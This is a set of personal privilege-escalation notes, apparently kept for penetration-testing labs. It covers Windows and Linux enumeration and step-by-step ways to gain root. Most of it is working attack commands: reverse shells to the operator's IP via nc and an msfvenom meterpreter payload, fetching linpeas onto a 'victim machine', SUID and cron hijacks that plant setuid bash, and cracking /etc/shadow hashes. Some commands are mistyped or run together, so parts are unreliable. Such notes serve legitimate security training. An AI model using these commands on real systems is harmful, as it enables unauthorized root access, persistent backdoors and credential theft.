###Manual Enumeration
- processes-services :
#Windows
tasklist /svc
#Linux
ps aux
- About-version :
#Windows
systeminfo | findstr /c:”os name” /c:”os version” /c:”systemtype”
#Linux
uname -a || cat /etc/issue
- Enum-Host_Name :
#Windows & Linux
hostname
- Enum-Users :
#Windows
whoami || net user || net user <username>
#Linux
whoami ||id|| cat /etc/passwd
- Open Ports :
#Windows
ipconfig /all || route print||netstat -ano
#Linux
ip a || ifconfig ss -anp || cat /sbin/route || netstat -anp
- Linux
iptables
⇒However, depending on how the firewall is configured, we may be able to glean information about the rules as a standard user ||/etc/iptables
- Windows
netsh advfirewall show currentprofile netsh advfirewall firewall show rule name=all
Scheduled task :
1. nano test.sh
2. chmod u+s /bin/sh
3. chmod +x test.sh
4. nano /etc/crontab
- * * * * * root /home/luka/test.sh
1. $ /bin/sh -p
2. $ whoami
in windows
schtasks /query /fo LIST /v
for Windows :
- wmic product get name, version, vendor
- wmic qfe get capion, discription, hosfixid, nstalledon
for Linux
dpkg -l
- for windows
- exec tool like ⇒ accesschk
c:\Tools\privilege_escalation\SysinternalsSuite>accesschk.exe -uws "Everyone" "C:\Prog ram Files”
- powershell script :
>Get-ChildItem "C:\Program Files" -R ecurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
- for linux
find / -writable -type d 2>/dev/null
- Windows
mountvol
- Linux
mount
- Windows
drivequery.exe /v /fe csv | convertfrom-csv | select-object ‘display name’, ‘start mode’, path
- Linux
1. lsmod
2. modinfo <modulename>
====================================
===============
Runas escalation via ⇒ CVE-2019-1388
===============
- for upgrade shell
SHELL=/bin/bash script -q /dev/null
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl +z
stty raw -echo && fg
reset
xterm2-
# upload linpeas
⇒ in your terminal
**sudo python3 -m http.server 1234
⇒** in victim machiene
**curl 10.10.16.15:1234/linpeas.sh >> linpeas**
chmod u+s /bin/sh
- www-data ⇒ data bases
- to compile c files → $
gcc <file-name> -o <name>
$ whoami
-----
## sudo without passwd
$ sudo -l
eh el7agat elle momken asta5dem feha sudo bdon ma yetlob password
#if /usr/bin/env then :
$ sudo /usr/bin/env /bin/bash
-----
##(kernal version vulns)
$ uname -a
$searchsploit <linux kernel version>
-----
## SUID Perm
$ find / -perm 4000 2>/div/null
$ find / -user root -perm -4000 -print 2>/dev/null
$ find / -type f -perm -04000 -ls 2>/dev/null
$ find / -type f -perm -u=s 2>/dev/null | xargs ls -l
$ find / -perm -u=s -type f 2>/dev/null
$ find / -user root -perm -4000 -exec ls -ldb {} \;
EX >> rwsx___.. /bin/nmap => root perm
$nmap --interactive
nmap> !whoami
if root
nmap> !nc -n <my-ip> <port> -e /bin/bash
https://vk9-sec.com/nmap-privilege-escalation
-----
#crontab file => which run every <s-time>
/etc/crontab
##i can use that to do backdoor
-----
Nmap - privilege escalation | VK9 Security
sudo -u#-1 /bin/bash
If you have write permissions on any folder inside the PATH
variable you may be able to hijacking some libraries or binaries:
echo $PATH
Check if any scheduled job is vulnerable. Maybe you can take advantage of a script being executed by root (wildcard vuln? can modify files that root uses? use symlinks? create specific files in the directory that root uses?).
crontab -l
ls -al /etc/cron* /etc/at*
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"
For example, inside /etc/crontab you can find the PATH: PATH=**/home/user**:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
(Note how the user "user" has writing privileges over /home/user)
If inside this crontab the root user tries to execute some command or script without setting the path. For example: ** * * * root overwrite.sh* Then, you can get a root shell by using:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
#Wait cron job to be executed
/tmp/bash -p #The effective uid and gid to be set to the real uid and gid
If you can modify a cron script executed by root, you can get a shell very easily:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > </PATH/CRON/SCRIPT>
#Wait until it is executed
/tmp/bash -p
If the script executed by root uses a directory where you have full access, maybe it could be useful to delete that folder and create a symlink folder to another one serving a script controlled by you
ln -d -s </PATH/TO/POINT> </PATH/CREATE/FOLDER>
#######
#!/bin/bash
#if tاis file run as root i can take shell as root :D
nc -n <ip> <port> -e /bin/bash
#for upgrade with meterpreter
# to create reverse shell file
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=//myip LPORT=rand-port -f elf > shell.elf
#send shell.elf to vectim machine
#in my terminal
$ msfconsole
msf> use exploit/multi/handler
msf> set payload linux/x64/meterpreter/reverse_tcp
msf> set lhost <my ip>
msf> set lport <my rand port>
msf> exploit
# on vectim machine run the shell file
#to get reverse shell in meterpreter
#to turn the meterpreter to shell
meterpreter> shell
sell# exit
meterpreter> help
exploits:
- kernel exploits: ⇒ vuls in version ... EX.( dirty c0w)
- stored passwords (config files)
- stored passwords (History) .. /.bash_history
- weak permission ⇒ /etc/shadow —> unshadow passwd shadow > output.txt —→ crack
$hashcat -m 1800 output.txt rockyou.txt -O
- ssh keys —→ find / -name id_rsa 2> /dev/null
- shell escaping ⇒sudo -l
- sudo abusing intended functionality
⇒sudo apache2 -f /etc/shadow ⇒root hash ⇒ echo ‘[ root hash ]’ > x.txt
john —wordlist=/user/share/wordlist/nmap.lst x.txt
- sudo (LD_PRELOAD)